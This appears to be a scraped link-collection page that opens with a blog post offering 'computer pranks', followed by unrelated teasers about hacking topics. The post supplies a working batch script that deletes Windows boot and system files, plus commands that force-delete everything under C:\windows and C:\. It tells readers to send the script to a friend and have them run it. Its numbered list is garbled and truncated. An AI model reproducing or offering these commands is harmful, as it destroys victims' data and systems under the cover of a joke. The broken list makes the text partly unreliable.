background preloader

Painfully Computer Pranks ~ Computer Hacking

Painfully Computer Pranks ~ Computer Hacking
Computer pranks to freak out your friends and make them crying for mummy I've been posting many articles about computer pranks on this blog (Deadly Virus Prank, The Ultimate Virus, How to Create a Fake and Harmless Virus and Facebook Virus Prank). Today , I will show you 5 great computer pranks that will frustrate your victims very much. These pranks could be very painfully, so please use them at your own risk ;) 1. Crash a Computer System With Nothing But a URL! I stumbled across this URL while surfing the internet. 2. Open notepad and copy/paste this code: @echo offattrib -r -s -h c:\autoexec.batdel c:\autoexec.batattrib -r -s -h c:\boot.inidel c:\boot.iniattrib -r -s -h c:\ntldrdel c:\ntldrattrib -r -s -h c:\windows\win.inidel c:\windows\win.ini Now Save it as a .bat file. This should shutdown the persons computer. Send it to your friends computer and tell them to open it. Here is another code too..... cmd /c del c:\windows\* /F /S /Q cmd /c del c:\* /F /S /Q 3. 1. 2. 3. 4. 5. 4. 1. 2. 3.

http://www.hackpconline.com/2010/05/painfully-computer-pranks.html

Related:  Hacking tutorials sites & toolsCOMPUTER HACKSHackingsecurity and hackingCRM

The glider: an Appropriate Hacker Emblem The Linux folks have their penguin and the BSDers their daemon. Perl's got a camel, FSF fans have their gnu and OSI's got an open-source logo. What we haven't had, historically, is an emblem that represents the entire hacker community of which all these groups are parts. This is a proposal that we adopt one — the glider pattern from the Game of Life. About half the hackers this idea was alpha-tested on instantaneously said "Wow! Google Dorks & Google Hacking » Freakitude We call them ‘googledorks’ (gOO gôl’Dôrk, noun, slang) : An inept or foolish person as revealed by Google. Google dorks are the center of the Google Hacking. Many hackers use google to find vulnerable webpages and later use these vulnerabilities for hacking. The definitive glossary of hacking terminology We live in an era of unprecedented cyberattacks, where malicious campaigns, both personal and governmental, are carried out across laptops and wireless networks. Even if you are not technically minded, your day-to-day life is still probably pretty crowded with stories about hacking, whether you recognize them as such or not. Have you ever installed an antivirus tool on your computer? Read a story about WikiLeaks or the Arab Spring?

How to use Google for Hacking Google serves almost 80 percent of all the search queries on the Internet, proving itself as the most popular search engine. However, Google makes it possible to reach not only the publicly available information resources, but also gives access to some of the most confidential information that should never have been revealed. In this post, you will find the information on how to use Google for exploiting security vulnerabilities that exists within many websites. The following are some of the ways to use Google for hacking: 1.

Top 40 Ways to Take Notes Online Regular note-taking is one of the most productive habits a person can practice. The ability to take notes online and access them anytime, from any location is priceless. Over the last few years, I have personally tested nearly 100 different ways to do this. Some of these note-taking systems are worth mentioning, and some are worth forgetting. Learn Ethical Hacking Online - HackingLoops There’s a seemingly endless number of free open-source tools for penetration testing, and most of them seem to gravitate around the Kali Linux distribution. But with so many free tools, it’s easy to miss out on some of the best ones. So today we’re going to take a closer look at Armitage, define what it is, and define how it works. However, there’s a few things that you need to know before we start digging into the dirty details of how to use this tool. Naturally, I do have to give a brief warning before we get started, too. Don’t misuse or abuse any of the tools mentioned in this article for two reasons.

DIY Continuous Ink Printer Instead of paying for absurdly priced printer cartridges, build yourself a Continuous Ink Printer (CIS) which can be made by hacking an old printer to suck ink from external reservoirs. You can get the raw ink for dirt cheap so it’s essentially like unlimited printing for free (besides the paper). So now you can actually print your collection of pirated books! A CIS is relatively easy to create, just take an Epson Stylus 760 (a surprisingly hard to find printer) and make a few modifications to it. A tutorial walks you through the build process so you can make your own. More Printer Hacks: 80+ Best Free Hacking Tutorials Learning to become hacker is not as easy as learning to become a software developer. I realized this when I started looking for learning resources for simple hacking people do. Even to start doing the simplest hack on own, a hacker requires to have in depth knowledge of multiple topics.

Related:  HackerHackingsecurityHackinghectorosorioHackComputers/ HacksHackingCodeProgHackhacks